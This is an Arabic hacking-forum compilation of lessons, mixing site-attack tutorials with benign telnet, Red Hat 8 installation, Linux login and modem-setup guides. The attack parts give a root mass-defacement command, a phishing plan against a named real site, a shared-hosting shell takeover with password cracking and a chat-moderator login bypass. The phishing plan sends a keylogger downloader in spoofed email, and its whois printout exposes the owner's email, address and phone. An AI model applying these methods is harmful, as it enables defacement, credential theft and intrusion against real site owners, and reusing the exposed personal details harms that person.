اما الذي بس وقته كله يخترق ويضع شعاره وهو له وقت طويل بالاختراق هذا اقول عنه كراكر

وانا لا اشرح الا الشئ الذي مريت به يعنى انا لما كنت مش عارف حاقه يعنى مش عارف راسي من رقليه يااخوان ((قلبنا : ) )) اول ماكنت مبتدئ كنت اتشائم اذا حاولت وحاولت اخترق وفشلت ولاوضعت شعاري وهذا من حقك كأنك مبتدئ ولك الحرية ويستاهل صاحب الموقع او الشركه اختراق موقعه اذا كان ماوضع حمايه لازمه ((وقانون الهاكر لايحمى مغفلين))
<<<< =---- لاتواخذوني مدمن لهجه مصرية : )
والان ابسط ياعم وهذا انا بشرح لك الطريقه ونبدا
............
الطريقه سهله جدا ---------- نفذ هذا الامر على السيرفر "Hacked by Super-Crystal"أو"no one is born a master but some are born to be master" هذا بدون شعار وصور يعنى فقط كلام وينزل على جميع الضحايا (المواقع) الى على السيرفر المخترق
فقط نفذ هذا الامر على السيرفر ::::: صلاحية روت ياقلبي
echo "Hacked by Super-Crystal" > /home/*/public_html/index.htm
اتمنى انك ترجع لموضوع الاخ سب زيرو (((( Mass Deface في منتديات تحت الصفر(sub-0.net/vb) لانه شارح طريقه وضع شعار غير هذه الطريقه وبنفس الوقت سهله جدا
## اسأله حول الموضوع ##
ماهي فائده الاكسبلويت؟؟
(اتمنى من الاخوه الجواب من نفس الموضوع حتى اتأكد ان شرحي واضح )
هل هذا النوع من انواع الباكدور؟؟؟
Kernel Exploits
حدد هل هذا من اللوق او ملفات الــerrors التى توجد بلوحة التحكم بالمنتديات؟؟
May-2004 01:19:32] [****] [client 212.77.56.1] File does not
--------------------__----____----____---___---___---___---___---___------------
____________---__-------___------__----__------__----__-----__-----________

في دروسنا ?لقادمة سوف نوافيكم بآخر الإخبار والمستجدات في الساحة العربية والحره والجزيرة
وفي الختام اتمنى من الله عزوجل انى قد وفقت بهذا الشرح المختصر
كاتب الموضوع: (SupEr-CrystaL) سوبر كريستال



================================================== ==============================





لمن يريد معرفت كل شيئ عن التيل نت

للكاتب :دكتور الحب


المقدمة :

هذا الموضوع كتب لكي يساعد المستخدم العادي على فهم التلنت وكيف يعمل



الأدوات :

( من الأفضل قراءة المستند بالكامل قبل إستعمال التلنت )

1- العقل

2- التلنت ، وهناك نوعان

- Ewan

- تلنت ( وهو الملائم لنا لأنة يأتي مع الوندوز )

في هذا المستند سوف نقوم بشرح تلنت الوندوز أما شرح الـ Ewan فسوف يكون في مستند آخر بإذن الله



ماهو التلنت ؟؟

هو برنامج ربط لشبكات TCP/IP مثل الإنترنت . التلنت يعمل على جهازك ويربطة مع أي سيرفر على الشبكة . تستطيع بعدها إدخال الأوامر عبر برنامج التلنت وسوف يتم تنفيذ هذة الأوامر وكأنك تدخلها مباشرة إلى السيرفر . وهذا يتيح لك التحكم في السيرفر والإتصال مع سيرفرات أخرى على الشبكة . وللإتصال بأي سيرفر يجب عليك الإتصال بأي منفذ (Port) مفتوح فية وإدخال إسم المستخدم وكلمة السر .



الأن كيفية إستخدام التلنت بالتفصيل :

لتشغيل التلنت في الوندوز إتبع الخطوات كما يلي :

Start > Run > telnet

بعد فتح البرنامج سوف ترى نافذة خالية بيضاء

( إذا كان هذا الشي يجعلك تصل إلى درجة إغلاق البرنامج فيجب أن تعرف أنة في السابق قبل إستخدام برامج الجرافيكس كيلنت مثل الإيميل كيلنت والمتصفح كان التلنت هو النافذة الوحيدة للدخول إلى الإنترنت )

بعد هذا إضغط على connect في القائمة الرئيسية وبعد ذلك إختر remote system وسف تظهر لك نافذة كهذة :

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|Connect ________________ |
|Hostname :|________________| |
|Port :|________________| |
|Term type:|________________| |
| ___________ __________ |
|| | | ||
|| Connect | | Cancel ||
||___________| |__________||
|_____________________________|


أحسن مكان لإتصالك الأول بالتلنت هو حساب الشل ( shell account ) الخاص بك . الشل أكاونت هو مساحة من نظام اليونكس Unix على الشبكة . أو تستطيع الإتصال بموقعك من خلال بروتوكول الـFTP

مثلاً كان الموقع http://www.mysite.com/ نكتب في خانة Host [ FTP.mysite.com ] يعني إذا كان إسم الموقع http://www.alkajool.com/ إذا نكتب في خانة Hostname [ FTP.alkajool.com ] وفي خانة Port نكتب رقم منفذ بروتوكول الـ FTP وهو 21 وبعد هذا نضغط على زر Connect وسوف يقوم البرنامج بالإتصال بالموقع . عندما يتم الإتصال بالموقع سوف يكون شكل نافذة البرنامج هكذا :


_______________________________________
|_Telnet________________________________|
|_Connect_Edit_Terminal_Help____________|
|220 proFTPD |
| |
| |
| |
| |
| |
| |
|_______________________________________|

في هذة النافذة سوف ترى نوع ونظام الـ FTP الذي يستخدمة الموقع كما نرى في الصورة فإن النظام هو proFTPD . الآ ن لكي ندخل إلى الموقع يجب أن ندخل إسم المستخدم وكلمة السر . نكتب هذا الأمر لإدخال إسم المستخدم [ user username ]

( إذا طلب منك الموقع إدخال إسم المستخدم مثل username أوLgin فتكتب إسم المستخدم فقط بدونuser)

ومن ثم سيطلب منك الموقع كلمة السر pass فإكتب كلمة السر هناك طريقة أخرى للدخول إلى الموقع وهي الأنونيوماس anonymous وسوف يكون فيها إسم المستخدم anonymous وبعد أن نكتب إسم المستخدم سوف نرى هذة الجملة guest login accepted الآن علينا إدخال كلمة السر وسوف تكون في هذة الحالة عنوان بريدك الإلكتروني وبعد هذا سوف يعطيك الموقع جملة تدل على أنة تمت الموافقة على الدخول إلى الموقع . الآن نكتب هذا الأمر help وسوف تظهر لنا الأوامر التي نستطيع إستخدامها فحاول التعرف على هذة الأوامر ووظائفها . بعد أن تنتهي من إستكشاف البورت 21 وطريقة الإتصال من خلالة وتعرف أوامر الـFTP حاول الدخول إلى الموقع بواسطة بورتات أخرى مثل هذة البورتات :

الخدمة البورت

------ -------

21 FTP
25 SMPT

37 TIME

79 Finger

80 HTTP

110 POP3

===========================================

اول درس في المواقع

للكاتب :وررس


--------------------------------------------------------------------------------


بسم الله الرحمن الرحيم

طيب شباب رجاءا وخاصه محبين القص واللزق مثل مايقولوا

ماينشر الموضوع الا بعلمي
بسم الله
طيب اذا وصلت الى مرحله من الياس بختراق موقع شتسوي تقول خلاص

لاطبعا الاختراق انواع والوسائل كثيره المهم توصل الى هدفك وانا انشالله بشرح لكم بالكلام طبعا وبالتفصيل طريقة اختراق اي موقع اما مساله بالصور انا مليت منها صراحه واعتقد اني اكلم اعضاء واعين ولاباس اذا فيه مبتدئين بيلاقوا انشالله الشروحات بالمنتدى على شان مااطول
ابدي

انا خططت اخترق موقع وخلنا نشرح على الموقع الملعون
http://www.meca-love4all.com
وحاولت اخترق الموقع بشكل رسمي وماقدرت ابدي اخترقه بهذي الطريقه اللي انشالله بتحوز على رضاكم وبيخترق فيها الكثير منكم انشالله

اولا اعمل سيرفر للبرنامج المحبب لي وانا افضل ياشباب البرنامج يكون كي لوغر وافضله بعد يكون برو اجينت الاصدار الاخير لانه بيجيب الباسووردات كلها وبشكل مرتب وحلو

طيب ثانيا ارفع الباتش على صفحتي الشخصيه واخذ اللنك واعمل فيه سيرفر داون لودر

ثالثا ياشباب احول باتش الداون لودر الى صفحه مفخخه وارفهعا على صفحتي واخذ اللنك تبعها

لاتستانسون ياشباب تو الناس الشغل للحين مابدا والهندسه الاجتماعيه هيا موضوعنا اليوم


افتح التيرمنال من اللينكس واللي ماعنده لينكس شيسوي يدور له على برنامج للامر whois يشتغل على وندوز والحمدالله البرامج اعتقد انها موجوده وقبل لاابدا بالشرح انا ابي شغلتين من الامر بس
ايميل صاحب الموقع والشركه المستضيفه
(3)

نطبق الامر وشوفوا النتيجه المرضيه


worse1980((@))localhost worse1980]# whois meca-love4all.com
[Querying whois.internic.net]
[Redirected to whois.opensrs.net]
[Querying whois.opensrs.net]
[whois.opensrs.net]
Registrant:
Meca
18305 Nightingle Ct,canyoun County
Ca ,91387
Canyoun County, Ca 91387
us

Domain name: MECA-LOVE4ALL.COM

Administrative Contact:
Adal, Sam truth10((@))rogers.com
18305 Nightingle Ct,canyoun County
Ca ,91387
Canyoun County, Ca 91387
us
8186339939
Technical Contact:
Adal, Sam truth10((@))rogers.com
18305 Nightingle Ct,canyoun County
Ca ,91387
Canyoun County, Ca 91387
us
8186339939


Registration Service Provider:
HomepageUniverse, support((@))homepageuniverse.com
+44.8457606128
+44.8457606128 (fax)
http://HomepageUniverse.com
HomepageUniverse may be contacted for domain login, DNS changes, and
all general domain support questions.


Registrar of Record: TUCOWS, INC.
Record last updated on 16-Apr-2004.
Record expires on 02-Feb-2005.
Record created on 02-Feb-2004.

Domain servers in listed order:
NS.HOMEPAGENAMES.NET 216.127.78.156
NS2.HOMEPAGENAMES.NET 216.127.78.41


Domain status:
ACTIVE

ممتاز حصلنا ايميل صاحب الموقع والشركه المستضيفه طيب وشنسوي الحين انا اقولكم واهني الهندسه الاجتماعيه تلعب دورها يعني تقدر تلعب على صاحب الموقع من غير معرفة الشركه المستضيفه انتا وذكائك واعتقد ان الكل لعب اللعبه هذي والهاكر الحقيقي هوا اللي يراوغ ويعرف يخدع ضحيتك ويمثل على اكمل وجه ويضبط دوره على الاخر والله ياشباب ان الجزء هذا اهم من كل الاجزاء الباقيه يعني لو انتا شخص محترف بالهندسه الاجتماعيه وتدرس ضحيتك قبل لاتنقض عليها وتعرف شنو يحب وشنو مايحب بتخترقه بسهوله تامه ولاتنسون ان انتا معاك لنك تبي تخترق فيه وهذا اقوى سلاح موجود وفتاك ياساتر!
(3)

الخطوه الاخيره هيا اني افتح اي برنامج يرسل ايميلات وهميه من عناوين وهميه ومثال على هذا البرنامج واعتقد انه افضل برنامج لهذا النوع هوا الماس ايميل وابدا ارسم خطتي على صاحب الموقع
ارسل من عنوان الشركه المستضيفه واقوله انه لازم يزور الرابط هذا لخلل معين بموقعه او لسيرفس معين او لغرض معين يخليه يضغط على اللنك وهوا اعمى وانتا وذكائك وترتيبك للموضوع
يعني كل ماضبطت العمليه كلما تكون قربت لباسوورد الموقع
عموما لما يضغط على اللنك بيكون باسوورد الموقع في ايميلك ينتظرك تدخل فيه السي بانل
:tu

ملاحظات ياشباب لازم يكون من الاساس في عمل الباتش اسم مميز للضحيه علشان اتفرق فيه بين ضحاياك وتضبط سيرفرك على الاخر وتاكد من انه شغال على شان مايروح تعبك ببلاش وهالله هالله
بالهندسه الاجتماعيه ياوحوش
(3)
اتمنى التوفيق للكل وانا والله كل شي عندي جاهز لكني ماطبق على الموقع المذكور لاني ابي مشاركتكم بالاختراق وتحياتي للجميع وانشالله ايكون الدرس جديد ومفيد


تحياتي

================================================== ===

الدرس الثاني في اختراق المواقع

للكاتب :ورررس



بسم الله الرحمن الرحيم
مثل مابديت بالجزء الاول ابدا بالجزء الثاني الرجاء عدم نقل الموضوع الا بستشاره ليش لان الموضوع ماهو نقل زي عادة الشباب ولا ترجمه الموضوع عصارة افكار وتجارب!
الشي المضحك اني ماراح ابدا زي عادة الشباب بنقل موضوع من الاف السنين موجود بالمنتديات يبهرو عليه وينزلوه يقولولك روح النت كرافت وتاكد ان الموقع يدعم الفرونت بيج واذا تاكدت اضف هذا الرابط بعد عنوان الموقع هههههههههه يروح المسكين ايتاكد ان الموقع يدعم الفرونت بيج وياخذ اللنك ويركض ويضيف عليه الرابط ويضغط انتر وهوا يقول ياربي تكفى يطلع الباسوورد

واخرتها شاشه غلط جايه بوجهه واذا طلع الباسوورد مشفر طار من الفرحه وقعد يعمل له كراك ثلاث ايام واذا اتفك التشفير طلع الباسوورد غلط ليش! لانه وهمي يامسكين ياهاكر كل هذا التعب واخرتها باسوورد وهمي ليش لان الشباب يحبوا ينقلوا المواضيع هذي ويشتتوا عقول المساكين
فيها ماعلينا ندخل بالموضوع لاني لو بتكلم بالموضوع اللي فوق ماخلصت!

اولا لو ابي اسال اغلب الاعضاء شنو الموقع يقول موقع مايدري شنو هوا الموقع وهذا انا ملاحظه والله عند الكل!
الموقع ياشباب اللي مرهبكم ومدوخكم ماهو الا على جهاز حاله حال اجهزتكم اللي تستخدمونها الجهاز منزل سيرفر ومنزل الموقع عليه يعني انتا اذا تبي تخترق موقع ترا انتا تخترق جهاز كمبيوتر متصل بالنت 24 ساعه جهاز عادي زي جهازك والله اي والله ليش مستغربين

طيب ياوورس اذا المساله بالشكل هذا انا خططت على موقع وابي اخترقه منين ابدا؟
اقولك
بسم الله

لازم تعرف الموقع نفسه شغال على ايش
وندوز
لينكس
يونيكس
الخ
ليه طيب اعرف؟
لازم ياحبيبي تعرف لانك بتسوي على الموقع سكان ومدام انك بتسوي اسكان لازم تعرف الثغرات اللي بتعمل عليها سكان تابعه لاي نظام بالضبط

ومنين اعرف اقولك ادخل موقع نت كرافت والزق رابط الموقع وهوا يقولك شغال على ايش
طيب عرفنا شغال على ايش وبعديــن
بعدين لازم تسوي سكان على الموقع وانا انصح ببرنامج الاخ عمران الغامدي اللي هو برنامج عمران سكان لانه سريع صراحه وقوي
طيب ياوورس حنا ليه نعمل سكان انا اقولك لانا نبي نلقى ثغره بالموقع توصلنا لملف الباسوورد واذا لقيناه قطعنا نص الطريق ويبقى فك تشفيره

اها طيب انا عملت سكان ومالقيت اي ثغره بالموقع وش العمل!
العمل انك تفحص البورتات المفتوحه بالموقع والغالب ماراح تخترق بالطريقه هذي لان بورت الاف تي بي والتلنت بيكون عليها باسوورد للحمايه اما اذا ماكان الباسوورد موجود حلال عليك الموقع

طيب انا عملت سكان على الثغرات وعلى البورتات وعجزت مالها حل ثالث عندك

والله فيها حل ثالث ورابع اذا انتا مصمم تخترق الموقع
كيف؟
الحل الثالث موجود بالدرس الاول وطريقة نجاحه ميه بالميه بس يبيلها اشوية تفتيح مخ وذكاء
اما الرابع هوا انك تحجز دومين على نفس السيرفر اللي عليه الموقع
ليه؟
لاننا بنخترق السيرفر كامل علشان نوصل للموقع اللي نبيه وشلون تتم الطريقه انتا احجز موقع على نفس السيرفر وارفع عليــه شل ومن الشل بتخترق السيرفر كامل!
فيه مشاكل نعم فيه السيف مود لكن كل شي وله حل واذا وصلت للسيرفر بتعرض من خلال الشل
جميع باسووردات المواقع اللي عليه ومن ضمنها موقع حبيبنا اللي نبيه

ياسلام وبعدين وصلنا لكن الباسوورد مشفر ديس ماهي مشكله المساله يبيلها اشوية صبر بس
شغل جون وخله يعمل كراك للباسوورد وانشالله يوم يومين بتحصل بالاخير الباسوورد ويعتمد وقت الفك على درجة التشفير للباسوورد وقوتها

اخيرا تحياتي للكل واذا الموضوع عجبكم انشالله بيكون فيه درس ثالث
اتمنى اني افدتكم ولو بجزء بسيط انا عارف المحترف بيمر على الموضوع ويمكن يستفيد معلومه معلومتين لكن انا متاكد ان المبتدا المستفيد الاول من الدرس وانا صراحه ماحبيتها اشوف الهاكرز يحوسون بالنت يدوروا شروحات وبالاخير شروحات من غير فايده قلت انزل الموضوع للاستفاده


تحياتي

================================================== =

ثغره لتدخل سوبر احمر او ازرق بالشات

للكاتب :Dr.HaCkErS

ملاحظة : لتطبيق هذه الطريقة يجب أن تعرف إسم أحد السوبر المشرفين
ملاحظة2: الثغرة على بعض المواقع تنجح والبعض الآخر لأ

الآن موضوع الأخ كاتب الموضوع

--------------------------
بعد التحيه شباب..

حبيت اقدم لكم ولأول مره في المنتديات العربية

هذه الثغره وهي خاصه بالدي جي تشات

ووضيفتها هي فقط تمكنك من الدخول كسوبر احمر أو أزرق..

البرامج التي نحتاج إليها:

الفرونت بيج أي أصدار..

ويجب ان تكون لك مساحه مجانيه على اي موقع على مزاجك

---------------
الاستخدام:
روح إلى الموقع الي تبي تكون سوبر احمر فيه....بعدين ادخل قسم المراقبين

رح يطلب منك الاسم والباسوورد أنت لا تهتم أظغط من الكيبورد الي عندك Ctrl+A بعدين Ctrl+C

روح إلى برنامج الفرونت بيج وسوي لصق ..

أمسح خانة أدخل الباسوورد

بعدها سوي حفض للصفحه الي سويتها ..

روح إلى المساحه المجانيه تبعك وحمل الصفحه الي سويتها

اذا حملتها وخلاص ادخل بأسم أي شخص من المراقبين ورح يتم دخولك . ولحين العب في الدي جي تشات لعب

لا احد يسألني ترى سهله جربوها

انا مجربها وناجحه 100%

منقول للفائده



تحياتي لكم


==================================================

طريقه تثبيت لينكس ريد هات 8 على جهازك والشرح بالصور

للكاتب والاستاذ : بوفهد

طريقة تثبيت لنيكس ردهات redhat 8 خطوة بخطوة

الكثير من مستخدمي الوندوز يرغبون في تجربة نظام اللنكس قبل التفكير في الانتقال كلياً اليه او حتى جزئياً. و الكثيرون يسمعون عن معاناة البعض في تنصيب النظام و الاختلافات التي يحويها و التي لم يتعودوا عليها في الوندوز. في هذا الدرس ان شاء الله سنقوم بشرح طريقة تثبيت لنكس ردهات 8 خطوة بخطوة مع صور عديدة تدعم الشرح.

الرجاء انتظار تحميل الصوور

بعد الحصول على الاقراص الخاصة بالنظام سواء بشراءه او استعارته من صديق او حتى تنزيله مجاناً من موقع الشركة. سيجد المستخدم ان لنكس ردهات8 يحوي على 3 اقراص رئيسية تحوي النظام و الكثير من البرامج كبرامج شبيهة بالاوفيس والفوتوشوب بالاضافة الى العديد من الاضافات.
في البداية نتأكد من ان الاقلاع في البيوس سيكون من السيدي روم, و من ثم نضع القرص الاول في سواقة الاقراص المدمجة و نعيد تشغيل الكمبيوتر. بعد الاقلاع ستواجهنا هذه الصورة:















تخيرنا الصفحة بما نريد ان نعمل, في حالتنا ( تثبيت النظام) نضغط على زر enter لنكمل اجراءات التثبيت بواجهة رسومية.
بعد وقت قصير سيسألنا النظام ان اردنا ان نعمل اختبار للاقراص المدمجة او السيديات التي لدينا لكي يرى هل هي صالحة ام تالفة, يمكننا عدم الدخول في هذه الاختبار لتوفير الوقت ان كنا متأكدين ان النسخ سليمة , الصورة التالية توضح المسألة و يجب ان نحتار .skip لنتجاور الاختبار




بعدها سيبدأ برنامج الاناكوندا الخاص بتثبيت النظام بالعمل حيث انه سيتأكد من نوع الفأرة و كرت الشاشة و غيرها من الامور التي يحتاجها لبدء عملية التثبيت و من ثم يتم الانتقال الى مرحلة بدء الاعدادات بالصورة التالية:





يتم اختيار اللغة التي يريدها المستخدم لاتمام عملية التثبيت ( هذا الاختيار لاتمام عملية التثبيت و ليس دعم اللغة في النظام) شاهد الصورة التالية:




بعدها سيسألك عن نظام لوحة المفاتيح الذي تفضله, نصيحتي هي ان تضغط على زر Next و تدع النظام نفسه يختار الذي يناسبه للوحة المفاتيح والفأرة, ففي اغلب الاوقات ما يختاره النظام هو الصحيح , الا لو كنت جازماً انك تعرف ان اختياره ليس دقيقاً, انظر الى الصورة التالية:









الصورة التالية تخيرك بنوعية الاستخدام الذي تنوي ان تستخدم فيه الجهاز, هل هو سرفر, ام لابتوب ام كمبيوتر شخصي عادي, عند اختيارك احدى هذه الاختيارات فان النظام سيثبت البرامج الخاصة على هذا الاساس, فمثلا ان اخترت ان يكون التثبيت و الاستخدام هو كسرفر, فلن تجد العاب عديدة مخزنة معه! لان السرفر ليس للّعب! او يمكنك ترقية النسخة الموجودة لديك باختيار upgrade existing system .اما ان كنت تريد ان تختار البرامج بدقة اكثر اختر custom لتختار بالضبط ما تريد و هذا ما سنفعله ان شاء الله:





بعد اختيار custom ننتقل لمرحلة تقسيم القرص الصلب لوضع النظام فيه. يوجد اختيارات عديدة هي Automatic Partition او manual partition using Disk Druid او manual partition using Fdisk. سنختار الخيار الثاني و ثم ننتقل للصورة التالية ( في حالة كنا نستخدم نظام اخر مثل الوندوز على نفس القرص الصلب) سيتم اعادة تقسيم القرص لتخزين اللنكس على المساحة خالية من القرص الصلب ( يجب تفريغ مساحة و جعلها خالية و يمكن ذلك بواسطة برنامج Partition Magic من الوندوز مثلا او من الFdisk عند تثبيت الوندوز او عمل ذلك بواسطة manual partition using Disk Druid او manual partition using Fdisk). بعد توفير مساحة خالية للردهات يجب تظليلها و الضغط على New ( في حالة اختيار الخيار الثاني) و ستظهر لنا نافذة نختار في اولها / من القائمة المنسدلة و نختار ext3 لتهيئة المساحة المختارة و نختار حجم المساحة, و في حالتنا في العادة نأخذ كل المساحة المختارة و من ثم نضغط على OK. الصورة التالية توضح اختيار القرص الصلب كله كخيار للنكس:







سينبهك على انك لم تختار مساحة للSWAP و هي تستخدم في العادة كنوع من دعم للذاكرة بحيث انها تستخدم جزء من القرص الصلب كذاكرة مؤقتة مثل الرام, و عادة يكون حجمها ضعف حجم الرام الموجود بالجهاز, يمكننا الاستغناء عن هذ هالخطوة رغم انها قد تطور الاداء..
نأتي بعدها لمرحلة تثبيت الLinux Boot Loader و هو برنامج يتم وضعه في اول القرص الصلب او احد التقاسيم التي يختارها المستخدم, وظيفة هذا البرنامج هو انه بعد ان يقوم المستخدم بتشغيل الجهاز و الانتهاء من اجراءات اختبار العتاد ينتقل الى قائمة بانظمة التشغيل الموجودة في النظام و عند اختيار النظام يتم تحميل النظام و الدخول اليه. يمكن اختيار نوع البرامج بالضغط على change boot loader و اختيار من Grub او LiLo او لا يتم تثبيت هذا البرنامج. شخصياً سأختار الGrub و ان رغب المستخدم بوضع كلمة سر هنا , يختار الخيار use a boot loader password





بعدها تأتي مرحلة اعداد كرت الشبكة , ان كنت مرتبط بشكبة و فيها DHCP Server ستحصل منها على الايبي فاكمل على نفس الخيارات الموجودة و ان كنت لا تستخدم DHCP server فاضغط على Edit و ضع الايبي الذي تراه مناسباً و ايضا بالنسبة للgateway و الDNS Server والhost name كالصورة التالية:




المرحلة التالية هي خيارات الفايروول او الجدار الناري. يتم اعداد الجدار الناري هنا بالسماح باي نوع من الاتصال بالجهاز, اذا لم يكن لديك خلفية عن الموضوع فاختر use default firewall rules و اختر Meduim من القائمة الاولى, اما ان كانت لديك خلفية عن الموضوع فانه من السهل اختيار انواع الاتصال الذي تتوقعه لجهازك مثل كونه web server فتسمح بالwww, ftp, SSH مثلا.
بعدها يأتي دور اللغات, نختار طبعاً دعم اللغة العربية في النظام كما هو موضح في الصورة:





بعدها نختار المدينة لكي يتم تضبيط ساعة النظام عليها. و بعد ذلك تأتي صفحة اختيار الكلمة السرية للمستخدم الجذر او الرووت, وهو مدير النظام و المسؤول عنه و بامكانه عمل كل شي بدون استثناء. من المفضل ان يتم تجنب استخدام هذا الحساب من غير ضرورة لانه كما ذكرت, فانه بامكانه عمل كل شي بدون انذار في بعض الاوقات, لان النظام يعتبر الرووت مستخدم عالم بما يفعل فلا ينذره في بعض الاحيان في حذف بعض الامور الهامة او غيرها من الامور, فينصح بعمل حساب اخر كمستخدم عادي و في حالة الرغبة بعمل شيء يستوجب حساب الجذر, يتم الانتقال له و من ثم الرجوع للحساب العادي.
بعد انتهاء من اختيار الكلمة السرية للجذر نضغط على Add و ندخل اسم المستخدم للدخول للحساب الجديد مع كلمة السر و اسمه الظاهر.






المرحلة التالية هي للاستخدامات الامنية من حيث استخدام ملف الshadow لحفظ الكلمات السرية فيه بعيدا عن الانظار و ايضا لتفعيل امور عديدة تختص بالAuthentication و التعرف على هوية المستخدم من خلال كلمة السر و غيرها من الامور. يمكن الضغط على زر التالي بشكل مباشر دون تغيير اي شيء.
جاءت الآن مرحلة اختيار البرامج الخاصة التي نريدها عندما اخترنا custom. الصورة توضح العديد من الخيارات مقسمة حسب الاختصاص, يمكن المرور على كل واحدة و اختيار علامة (صح) على الجزء الايسر من الكلمة و من ثم الضغط على Details لمشاهدة تفاصيل البرامج التي تأتي معها, يمكن اضافة و ازالة البرامج بدقة من هناك. طبعاً يمكن تثبيت كل شي و لكن هذا سيأخذ مساحة كبيرة نوعاً من القرص الصلب





بعدذلك سيبدأ بنقل الملفات الى القرص الصلب و بدأ عملية تثبيت البرامج و غيرها, و هذه المرحلة ستأخذ بعض الوقت و ذلك يعتمد على الاختيارات التي تم اختيارها و على سرعة الجهاز و غيرها من الامور





بعد الانتهاء من نقل الملفات الى القرص الصلب, سنصل الى مرحلة تعريف الشاشة بالنظام, في الغالب سيتم التعرف عليها بالاسم, و ان لم تكن النتيجة دقيقة و اعطت Unprobed Monitor مثلا فاختر ادق شاشة من قائمة الGeneric في حالة لم تجد الشاشة ذاتها في قوائها الشركات الموجودة.
هذه الخطوة حساسة, يجب ان تتأكد من ان ارقام الHorizontal Sync وال Virticaly Sync صحيحان, وفي حالة وضع ارقام غير صحيحة, فان الموضوع قد يسبب تلف للشاشة.






سيتم الانتقال الى اختيار ضبط الشاشة , من حيث اختيار عمق الالوان و دقة العرض كما هو موضح في الصورة التالية:




بعد الانتهاء من هذه الخطوة , ستصل الى نهاية عملةي التثبيت, ستحصل على رسالة تهنئة بانتهاء العملية و يجب ان تعيد تشغيل الجهاز حتى تدخل الى النظام.
بهذا نصل الى نهاية درس اليوم والذي اتمنى ان يكون قد اضاف جديد لديكم..
تحياتي
بو فهد

جميع الحقوق محفوضه للكاتب الاصلي بوفهد

================================================== =======



درس في الينكس للمبتدئين كيفيه الخروج من النضام

للكاتب :بوفهد

====================================

السلام عليكم
راح اخش في الموضوع على طول :
كما نعرف ان بعضكم قد واجه صعوبة مثلا في تركيب Linux وبعد ما كرهLinux تركب له
المهم بعد تركيب النظام ، لكي تدخل على النظام وتطبق العمليات لابد من تسجيل الدخول للنظام والتسجيل يكون من يوزر وباسورد ويكون معاك عندما قمت بتسجيله اثناء تركيب النظام
ولا حظ انه ليس حساب root
بل حساب المستخدم
وكما نعرف ان لينكس يقدر يضيف الاف المستخدمين.
المهم راح اشرح تسجيل الدخول والخروج في الواجهه النصية والرسومية
------- تسجيل الدخول --------------login
---
::الواجهه النصية::
---
إذا قمت بتركيب نظامك على الشاشة النصية ستظر لك شاشة شبيها بالتالي:
login:
هنا يطلب منك اسم المستخدم ، قم بإداخله
بعد ما تدخل اسم المستخدم اضغط على انتر Enter
ثم تظهر الكلمه التالي
password:
هنا تقوم بإدخال الباسورد الخاص باسم المستخدم ولاحظ عند كتابته لا يظهر الباسورد ابدا كانك ما تكتب شي وهذا حماية لحسابك عشان ما احد يشوفها..
بعد ما تدخل الباسورد اضغط على انتر Enter
وبعدها سيتم إدخالك بإذن الله على النظام
والحين قدامك النظام طبق وتعلم

---
::الواجهه الرسومية::
---
الواجهه الرسومية بسيط جداا وبإمكانك معرفتها تماما
تحتوي على مربع خاص بإسم المستخدم
user
ومربع خاص للباسورد
passwoed
قم بإدخال اسم المستخدم في المكان المحدد
والباسورد في المكان المحدد ايضا
ثم قم بالضغط على Enter
او بالضغط على زر
login
وصار النظام قدامك

------- تسجيل الخروج -----------logout
تسجيل الخروج مهم جداا إذا كان هناك عدد من المستخدمين على جهاز واحد وانتبه ان تترك جهازك مفتوح عندما تكون بعيد منه
---
::الواجهه النصية::
---
لتسجيل خروجك من الواجه النصية اكتب الامر
logout<
وبعدها يتم تسجيل خروجك
بعض اغلفة الشل ما يشمي معاه الامر هذا يظهر رساله خطا:
No login shell
لا تخاف من الرسالة ذي
اكتب الامر هذا إذا ماضبط معاك الامر logout
exit<
وسيتم تسجيل خروجك من النظام
---
::الواجهه الرسومية::
---
بشرحها على واجه KDE لانها منتشره بكثره
تروح تضغط على زر K الموجود في شريط الادوات ثم تظهر لك القائمة الرئيسية لـ KDE
قم بإختيار
logout
بتظهر لك رسالة تقولك النظام جاهز للخروج اضغط على زر
logout
وبكذا تم تسجيل خروجك
----- انتهى الدرس ---------
ملاحظه:
جميع الحقوق محفوظةلـ منتديات العاصفة
:MaN~HaCkErZ:

================================================== ===

كيفيه تعريف المودم على اجهزه لينوكس

للكاتب :بوفهد

كيفيّة تعريف اجهزة المودم على اجهزة Linux


قبل الدخول فى تفاصيل تعريف المودم سأفترض الاتى:

1-لديك مودم مثبت على الجهاز
2-نظام التشغيل لديك هو Linux
3-حساب اتصال مع مزود خدمة انترنت
4-تعرف نوع المودم لديك PCI ام ISA
5-تعرف ان المودم الذى تستخدمه هو جهاز Hardware Device اذا لم تكن متاكد اذهب الى

http://www.idir.net/~gromitkc/winmodem.html

وتاكد اذا كان جهازك بالقائمه
ولتتاكد ان جهاز المودم لديك مدعوم منLinux اذهب الى http://www.linmodems.org
* اذا كان جهاز المودم لديك خارجى او ISA فهناك فرص لان يكون معرفاً ولتتأكد من ذلك
ادخل ك مشرف Root واكتب الامر التالى
*setserial -bg /dev/ttyS#
اذا كان المودم لديك ISA External ستجد


/dev/ttyS0 at 0x03f8 (irq = 4) is a 16550A
/dev/ttyS1 at 0x02f8 (irq = 3) is a 16550A


اما اذا كان المودم PCI فسنقوم بخطوات قليله هى:

ادخل ك Root واكتب الامــر

cat /proc/pci

يجب ان ترى الرسالة التاليه بعد تنفيذ الامــر
Serial controller: Unknown vendor Unknown device (rev 1).
Vendor id=12b9. Device id=1008.
Medium devsel. IRQ 5.
I/O at 0xfcc0 [0xfcc1].
Bus 1* device 0* function 0:


سنستعمل هذه المعلومات لضبط المودم بأستعمال setserial

استعمل الامــر التالى

setserial /dev/ttyS2 uart 16550A port 0xfcc0 irq 5

ولاتنسى تغيير القيم بالتى ظهرت لديك فى الخطوة السابقه

من بعد يجب ايجاد طريقه لتحميل هذا الامــر كل مره مع تحميل الجهاز Booting وذلك اذا كنت تعمل على ريدهات او ماندريك ستجد ملف بأسم
rc.local على المسار
(/etc/rc.d/rc.local)
بعد ان تأكدت من وجود الملف ادخل كمشرف Root ونفذ الامـــر

echo setserial /dev/ttyS2 uart 16550A port 0xfcc0 irq 5 >> /etc/rc.d/rc.local

سيقوم هذا الامــر بأضافة المعلومات الناتجه الى نهاية الملف.

الان لأختبار الامــر حينما نكتب

*setserial -bg /dev/ttyS
يجب ان نرى معلومات مشابهه لهذه مع ملاحظة تغيير القييم

/dev/ttyS2 at 0xfcc0 (irq = 5) is a 16550A


بعد ذلك اذهب الى معالج الاتصال Dialup Connection وجرب الاتصال اذافشل فقط غيّر فى
*ttys
كل مره بقيمة جديده حتى نجد المكان المناسب
